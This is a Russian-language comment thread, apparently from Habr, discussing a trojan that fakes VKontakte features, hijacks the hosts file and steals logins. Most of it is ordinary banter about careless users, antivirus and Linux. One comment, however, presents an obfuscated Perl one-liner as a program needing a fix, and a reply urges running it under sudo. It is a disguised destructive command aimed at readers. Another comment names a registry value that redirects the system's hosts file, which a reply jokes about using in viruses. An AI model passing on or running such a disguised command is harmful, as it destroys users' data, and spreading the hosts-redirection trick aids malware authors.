Pull to refresh

Comments 136

А люди потом спрашиваю: «и как меня взломали интересно?! к чёрту антивирус!»
«К черту анивирус!» говорят те люди, которые знают, что да как в этих ваших интернетах. Остальным он крайне рекомендуется.
Просто антивирусом (а против данного зловреда больше помог был файрвол), тоже надо уметь пользоваться, а не банально разрешать всё, как делает большинство, что называется, «домохозяек». Если вручную давать всему доступ — в подобном ПО вообще нет смысла.
-А что, эта машина ваша, есть у неё защита от дурака?
-Да. Но только не от руководящего.

Кажется из Стругацких.
Я даже залогинился специально, чтобы плюсануть твой коммент.
немного холивара. Ubuntu — к черту антивирусы.
Я люблю поиграть в игры.
А Убунту я использовал когда не любил игры. Так то.
А я почему-то стал играть в различные игры, только когда перешёл на Ubuntu. А в Windows в игры уже много лет не играл.
Когда я болел World of Warcraft, я попробовалл его запустить его под wine. На одной и той же машине. Не могу объяснить как и почему, но под wine он работал шустрее, можно было настройки выше ставить. Не знаю как с другими играми.
Удивляюсь почему проактивка всех антивирусов давно не блокирует запись в hosts.
Сделать ведь просто.
Такую тему закрыли бы…
*А то раз в неделю про такой спам.
Касперский по дефолту блокирует. При чем, довольно активно. Чтобы разрешить Notepad'y доступ к hosts — пришлось создать спец. правило :)

Так что за все антивирусы — не говорите ;)
Запись в hosts и без того заблокирована UAC.
Если на UAC нажато да, у вредоносного кода есть права админа и пить боржоми уже поздно.
rw в hosts нередко нужен, например Denver меняет его при каждом пуске-стопе. Кому hosts не нужен или опасен, можно закрыть его правилами NTFS от записи и/или чтения да и вся недолга. Нужные хосты можно всегда прописать на локальном DNS-сервере. Ну и как уже сказано UAC в W7 конечно тоже рулит.
Ну могли бы так не изгаляться. Примерно неделю назад мне постучался товарищ в панике. Говорит о ужас! Контакт заблокировали у него на пк. Спросил, что же он делал перед этим. А причина очень даже банальна. Пришло письмо с просьбой скачать *.exe. Ну он любезно скачал, проверил на антивирусе и любопытство взяло свое :) Запустил… А как было тяжело ему объяснить как вытащить hosts в блокнот. Ибо старый хостс стал скрытый а появился новый hюsts. Странное название они придумали для липового файла. Могли бы «o» заменить «о» кириллицей, например…
Ибо старый хостс стал скрытый а появился новый hюsts. Странное название они придумали для липового файла. Могли бы «o» заменить «о» кириллицей, например…
Могли бы просто изменить путь к используемому систмеой файлу hosts в реестре:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath
Ну в принципе тоже вариант, но тут уже может и антивирус это увидеть. Хотя…
Спасибо, не знал, теперь буду и там искать при лечении знакомых =)
«Спасибо, не знал, теперь там буду менять при написании вирусов» %)
А мифы снова процветают. Вы сначала попробуйте, а потом пишите, т. к. этот параметр не работает.
Чтобы не повторяться, читайте тут и ниже.
Никаких мифов. В Windows XP это действительно работает. Проверено.
И об этом, кстати, написано и в официальных статьях Microsoft:
support.microsoft.com/kb/314053/en
support.microsoft.com/kb/314053/ru
Только, чтобы изменения вступили в силу, нужно перезагрузить систему.
Можно поинтересоваться, вы лично это проверяли? Если да — напишите каким образом повторить ваш успешный эксперимент, потому что у меня он не работает.
Как снова доберусь до WinXP, постараюсь ещё раз проверить и написать.
Как бы это не было печально, но офисный и домашний планктон никогда не поумнеет. Таковы законы природы…
Это, наоборот, очень и очень позитивно! Пока существуют ламеры, у людей шарящих всегда будет работа.

Простите за грубый французский:
«Скупой платит дважды, а лох — по жизни»©
Вставлю свои 5 копеек: «Лох не мамонт — весь не вымрет». Печально, в общем, сколько лет одно и то же происходит.
UFO just landed and posted this here
Более того, мы все лохи как минимум в нескольких областях. Так никто и не корчит из себя гуру — просто фраза то вселенская^Wдостаточно всеобъемлющая ;)
настоящие лохи — это те, кто лохи во всем.
Можно посмотреть и иначе — пока существуют люди, обмануть которых достаточно просто, никто не будет городить несусветно сложных схем. А простые мы расколем и так.
Тоже недавно у знакомой лечил подобное. Открываю hosts а там вроде как пусто, но размер его 143 Кб =) Думаю что что-то не то. Открываю снова, нажимаю Ctrl+A и вижу что там пустые строки и пробелами сдвинуто лишенее =) Хитрые =) Отчистил, удалил зловредную софтину.
А дома у меня антивируса нет ибо «Нет Windows — нет антивируса». Линуксом пользуюсь.
Замечу что данный зловред скорее всего еще и на mail.ru по тому чего получил подолбиться попробует. и там спама наворотит =)
И под Windows можно не пользоваться антивирусом, если не качаешь подобных троянов, постоянно не вставляешь флешки с авторанерами, не качаешь пиратский софт. Я так сидел около 2-х лет под WinXP, а под Windows 7 будет еще проще.
+ своевременно ставишь апдейты и не работаешь под админом (в большей степени справедливо для WinXP).
Сижу на XP SP2, антивирусом и файрволом не пользуюсь, обновления не ставлю, к Интернету подключен постоянно, пользуюсь варезом, а вирусов все нет и нет. Что я делаю не так?
Это всего лишь значит, что ты их не видишь :-))
По моему, уже лет пять назад было так, что если хороший зловред хорошо укрепился в систему, то его никто и ничто не увидит.

Так что неудивительно.
Запускаете под этой же виндой? Если да, то и не увидит.
Вирус так хорошо укрепился, что даже не виден при запуске CureIt из ERD Commander.
Слепая вера в абсолютные возможности CureIt и прочих подобных средств разовой проверки ничем не оправдана. Толково написанный руткит единожды пропустив в систему навряд ли получится вычистить.
Кстати помогите, пожалуйста исправить такую программу:

cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

— не печатает
Да нет, всё печатает.
Попробуйте её запустить через sudo, может так у вас получится.
«Нубы должны страдать»? :-)
UFO just landed and posted this here
Вы себе даже не представляете, сколько еще таких людей…
Троян составляет готовые расстрельные списки для сторонников Евгеники.
Или бесплатных голосов/плюсов к рейтингу :)
Рейтин кстати отменили =)
Это только на руку вредителям. Будет очередная замануха для лохов — заплати 100 рублей и включи себе рейтинг
Ну зачем же вы подсказываете то им..? =)
А лохи всё равно будут вестись :)
Или как вариант — возвращение полоски рейтинга и быть первым во всех поисках.
Чем только не занимаются школьники, лишь бы не делать уроки
В СНГ ещё есть люди верящие в золотой значок айсикью!
Конечно, ведь чтобы получить золотой значок, нужно стать Королем Аськи!
Пока будут люди, желающие «рамочку», будут и люди, которые на этом заработают. Люди все так же верят гадалкам, ведуньям и прочим. А есть ли эта рамочка вообще, или нет — не так уж важно. Культура и образованность же!
А не было бы у юзеров, сидящих «из-под админа» в винде прав на запись в hosts, уже полегчало бы.
Сделать же такое не сложно.
Это уже давно сделано. Но многие еще сидят на XP десятилетней давности.
Хах, да я ради таких функций проигнорирую предупреждение UAC, безопасность ничто в сравнении с ЗНАНИЯМИ
Мда, весело. Удивительно, что на это ещё кто-то ведется, кроме новичков.
Новички подрастают и проявляются каждый новый день.
Ага, новички подрастают, головы растут, а вот полезный объем у них не изменяется, так что концентрация мозгов становится всё меньше.
Все, это было последней каплей. Удалю страницу.
> Удалю страницу
Ха-ха, насмешил.
Поржал? Молодец!
Тем не менее, удалил, как и обещал.
Надеялся на минусы в карму, а вы рейтинг даже занулить не смогли.
> Тем не менее, удалил, как и обещал.

Наивный. Ничего на самом деле не удалилось и по прямым ссылкам по-прежнему доступно.
поздняк метаться!
Рецепт счастья прост: Nix-based система (Linux/MacOS/BSD) + не юзать вконтакте?
Что помешает вместо .exe файла впулить deb пакет и попросить ввести пароль?
Обычно пакеты ставятся из репозитариев, довольно редко когда сторонние. Но я понял, к чему вы клоните. Мозг необходим при использовании любой ОС :-)
Мозг нужен, безусловно, но пока работают балканские вирусы «скопируйте этот код и вставьте в строку ввода адреса в браузере» рассчитывать на его наличие не стоит.
Как только nix-based системы широко распространятся среди новичков, появятся вирусы и для них. Например «установите обновление для Flash-player, чтобы посмотреть это видео». А по ссылке — sh, выкачивающий rpm/deb под вашу систему. И ведь будут вводить пароль рута, это уж как водится.
Я всё не понимаю зачем так сложно. Скачивается просто бинарник/файл на скриптовом языке в ~ или /tmp и запускается. Не нужны пароль рута и иже с ними.
Если для того, чтобы потырить логины/пароли или разослать спам ВКонтакте — то да, этого вполне достаточно.
Пароль рута же нужен для создания ботнетов, кейлоггеров и прочих схожих шалостей.
Кейлоггер — да, для ботнета зачем рут?
Чтобы бороться с антивирусами, разумеется. (Под Макось уже есть антивирусы, например)
Их ставит такой небольшой процент пользователей, что палиться и спрашивать пароль рута смысла нет.
Я рассуждаю о том времени, когда nix системы будут иметь свой весомый процент, а значит будут привлекательны для вирусописательства. Как только это случится, процент антивирусов вырастет.
И да, можно же не палиться, и запрашивать пароль рута, только если антивирус есть.
Скаченный файл не будет исполняемым. Надо еще «объяснить» пользователю как его сделать исполняемым и запустить.
Есть zip-архивы с автозапуском файла.
UFO just landed and posted this here
Я не в курсе, а что там? jar автозапускается на всех системах или что?
UFO just landed and posted this here
Могут быть использованы так называемые drive-by атаки на браузер. Возможно, не совсем верно выразился, но я сталкивался с подобным. При переходе на сайт производится попытка запустить ява-апплет. Под виндой загрузка ява апплета включала видео-ролик, а на фоне скачивала и запускала трояна.
На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
От такого троянца легко защититься. У меня /tmp, /home, /var монтируются с ключом noexec, и скачанные программы случайно запустить невозможно в принципе.
Но если запустить очень хочется, то придется делать много телодвижений: перезаходить рутом, копировать в /usr/local/bin, ставить право запуска — и только тогда можно запускать. Случайно такую последовательность не исполнишь.
Так вы и не будете являться целью такой атаки, ею будут являться простые пользователи, которые покорно выполнят все инструкции по запуску трояна.
Я думаю, что простые пользователи устанавливать Linux позовут знающего человека, который настроит им права по-уму. Тогда троянца запустить будет столь же непросто, как и в приведенном мной примере.
Позволю себе поправку: не «как только», а «если» всё-таки. Тенденций подобных пока не намечается.
Доля МакОСи неплохо растет.
Да, вы правы. Постоянно забываю, что за её внешностью она nix-based. ^_^
«Установка полноСью завершена!»
Спешили видимо :)
Ага и «настРоятельно просим»
И еще «без всяких помех»
Интересно, ключ на антикапчу ещё живой?
Спасибо! Сейчас имено так и попробую сделать у себя Ubuntu. Довольно красивый выход в случае с DropBox.
Извиняюсь! Не в ту тему описал :(
Хорошо что акк/пасс туда вбили! ;)
Мне кажется правильнее было бы отправить его разработчикам антивирусов. Тогда об этом об этом вирусе узнали бы не только читатели хабра но и все пользователи этих антивирусов.
В чем смысл поста-то? В том, что не нужно ходить на левые сайты, шифрующиеся под ВКонтакте или самому запускать хрень, которая одарит вас мега-фичей? Бред какой-то честное слово.
Надо быть полным дураком, чтобы видеть адресную строку и продолжать вводить свои данные. В данном случае, всё наглядно видно.

P.S.: «Нет ещё даже на Facebook» — порадовало.
Тут конечно можно сказать ппару нелицеприятных слов про ОС, которые позволяют запустить с полными правами любой скачанный из интернета файл. Но зачем о плохом, давайте лучше о хорошем.

А радует в этой ситуации то, что имеется большое число людей, которые легко разводятся подобными примитивными приемами. Ведь любому разработчику могут понадобиться аккаунты вконтакте, а с введением всех этих дурацких подтверждений их нигде не достать, даже за деньги, (в пределах разумного), и администрация их вроде не продает. Так что я вполне понимаю авторов программы. Дуров сам виноват, нечего было закрывать регистрацию.
Тут нужно писать нелицеприятные слова не про ОС, а про прокладку между креслом и клавиатурой. У меня дома на компе основной ОСь стоит винда, и я постоянно лажу по этим вышим интернетам, пользуюсь его ресурсами, и знаете, у меня за всю жизнь еще ни разу не появилось ни одного порнобаннера, ни «взлома моего аккаунта вконтакте», и ничего прочего из этой оперы. И да, антивируса у меня нет, Хотя периодически выполняю полную проверку кампутера каким нибудь антивирем, типа CureIt.

вывод: во всех проблемах с утечкой паролей, завирусованностью компьютеров, и т.д., как уже было озвучено ранее, виновата прокладка между клавиатурой и креслом.
> вывод: во всех проблемах с утечкой паролей, завирусованностью компьютеров, и т.д., как уже было озвучено ранее, виновата прокладка между клавиатурой и креслом.

Вы не правы. Сегодня компьютер — не университетский монстр, которым пользуются молодые ученые для расчетов, а массовый инстреумент для работы и развлечения. Значит, им пользуются десятки миллионов людей (и в ближайшем будущем к ним добавятся сотни миллионов из развивающихся стран).

Вы предлагаете заставить всех их потратить миллиарды часов человеческих жизней на заучивание дебильных правил поведения в криво написанной операционной системе? Вам не кажется, что честнее, справедливее и выгоднее для мировой экономики напрячь несколько сотен программистов, чтобы они уже исправили свои ошибки и написали нормальную ОС?

Компаниям нужна безопасная, надежная, производительная рабочая среда. Людям нужен надежный. не ломающийся и не требующий денег (либо производителям не работабщих антивирусов, либо вымогателям) инструмент для развлечений с простым и понятным интерфейсом, без драйверов, реестров, sudo apt-get install и прочей магии. Заумные абстракции и интерфейсы никому не нужны. А вы со своими ретроградскими взглядами, может тогда всех пересадим на телетайпы назад?

Смешно читать сентенции про «прокладки между креслом и клавиатурой». Когда в заболеете, вы наверно окажетесь прокладкой между операционным столом и скальпелем? Хотя, почему их любят повторять на Хабре, понятно — ведь некоторым людям кроме сомнительной ценности знаний, как ставить кривые драйвера через правку реестра, и похвастаться то больше нечем, чтобы поставить себя выше остальных.
Сегодня автомобили — не роскошь, а средство передвижения, значит ими пользуются десятки миллионов людей, и с каждым разом число автомобилистов растет.

Вы предлагаете заставить тех, кто присоединяется к числу автомобилистов потратить миллиарды часов человеческих жизней на заучивание дебильных правил дорожного движения, практикуясь на кривых отечественных автомобилях? Может собрать несколько сотен толковых инженеров, и дизайнеров, чтобы они исправили ошибки всех остальных инженеров и дизайнеров, и спроектировали нормальный автомобиль?

Компаниям и людям нужен безопасный, надежный, мощный, дешевый в обслуживании, не требующий больших вложений автомобиль для развлечений и передвижения, с простым и понятным управлением безо всяких заморочек с переключением скоростей, сигналок, каких то непонятных зажиганий, безо всяких правил, заправок, и другого обслуживания. Заумные ПДД, и знание законов никому не нужно. А вы со своими ретроградскими взглядами, может тогда всех пересадим на велосипеды назад?

>Смешно читать сентенции про «прокладки между креслом и
> клавиатурой». Когда в заболеете, вы наверно окажетесь прокладкой
> между операционным столом и скальпелем? Хотя, почему их любят
> повторять на Хабре, понятно — ведь некоторым людям кроме
> сомнительной ценности знаний, как ставить кривые драйвера через
> правку реестра, и похвастаться то больше нечем, чтобы поставить себя
> выше остальных.

Не сравнивайте одно с другим. Во-первых, чтобы оказаться на операционном столе, Вам должно крупно не повезти, а во вторых, в хирургии работаю профессионалы своего дела, которые дипломы, и прочие сведения об образовании явно не покупали, а честно учились, честно нарабатывали опыт, и т.д.
>а во вторых, в хирургии работаю профессионалы своего дела, которые дипломы, и прочие сведения об образовании явно не покупали, а честно учились, честно нарабатывали опыт

Приезжай в Россию и сходи в больницу. Твоё мнение резко изменится.
я живу в России
Неуклюже. Дополнительная аттестация на право управления автомобилем нужна только из-за того, что он является средством повышенной опасности. Компьютер таким средством не является.
Тут конечно можно сказать ппару нелицеприятных слов про ОС, которые позволяют запустить с полными правами любой скачанный из интернета файл
А что, вы хотите чтобы это было вообще нельзя?
Да, хочу. Ну если и можно запустить, то либо а) с цифровой подписью от разработчиков дистрибутива (которые ее кому попало не дадут) либо б) скачав руками, распаковав, сменив права доступа, переместив куда-нибудь в /Programs/Other, и только из консоли.
У меня были подозрения, что используется какой-то конвертер, вроде bat 2 exe и прочих, но руки перепробовать все пока что не дошли.
У bat2exe внутри исполняемый файл есть и строчка b2e.exe или b2e.dll.
Если бы использовали PB, то в чем смысл фигачить батник? Это же идиотизм.
Как был вообще определен PB? По-моему он ничем мне известным точно не определяется.
И не такое бывает: завернут в bat2exe, или тот же QBC батник, который дропает vbs, который, например, дропает EXE. Был бы у меня под рукой PureBasic — я бы сказал, как он определяется.
peid, exe info pe вроде бы, нету сейчас возможности проверить.
Вполне возможно, что это фальшивая сигнатура.
ни один из моих разнообразнейших экзешников, собранных в версиях пб от 4.0 до 4.51 не определяется в peid последней версии
а вот за exeinfo спасибо, про него не знал — в нем как раз определяется, только версия не та
That's why we can't have nice things. Кто-нибудь может объяснить, почему этим людям может понадобиться такое? Неужели у людей нет целей и занятий поинтереснее, что их так интересует, кто заходил к ним на страничку, кто поставил им единицу за фотку, какая у них рамочка вокруг аватарки. Прямо какая-то эпоха королей аськи.
Моё мнение: так им и надо. Своего рода естественный отбор.
Меня вот больше интересует почему нет занятий поинтересней у программистов, создающих это. А то, что есть те кого интересуют аватарки с машиной внизу и крутым рэпером и прочие красоты это факт, далеко ходить не надо, у меня двоюродная родня в друзьях есть (как же откажешь родным если стучатся в друзья), мелкие еще да из деревень сами по себе. Вот у них на страницах кишит всё подобными штуками, и ведь качают и устанавливают.
Думаю скорее дело в доходах, чем в спортивном интересе.
Мыслите позитивно.
Ключ на антикапчу. На халяву!
Такими постами вы нарушаете естественный отбор.
Теперь осталось написать жалобу, чтобы данный сайт забанили у хостера :)

inetnum: 91.193.192.0 — 91.193.195.255
netname: OD-HOSTING-NETWORK
descr: Odessa Hosting Service
country: LV
org: ORG-UTS3-RIPE
admin-c: JS1050
tech-c: JS1050
status: ASSIGNED PI
mnt-by: GENERALSERVICE-MNT
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: GENERALSERVICE-MNT
mnt-domains: GENERALSERVICE-MNT
source: RIPE # Filtered
[капитан_моде=он]
Судя по адресу из photo_url — это вот этот индивидуум vkontakte.ru/id7041153
[капитан_моде=офф]
Это одна из жертв вируса.
Из текста топика это никак не выводилось. Если так — прошу извинить.
image

Вроде как опечатки в окне установщика уже должны наводить на некоторые мысли.

Хотя, в слове "Настроятельно" что-то есть.
Sign up to leave a comment.

Articles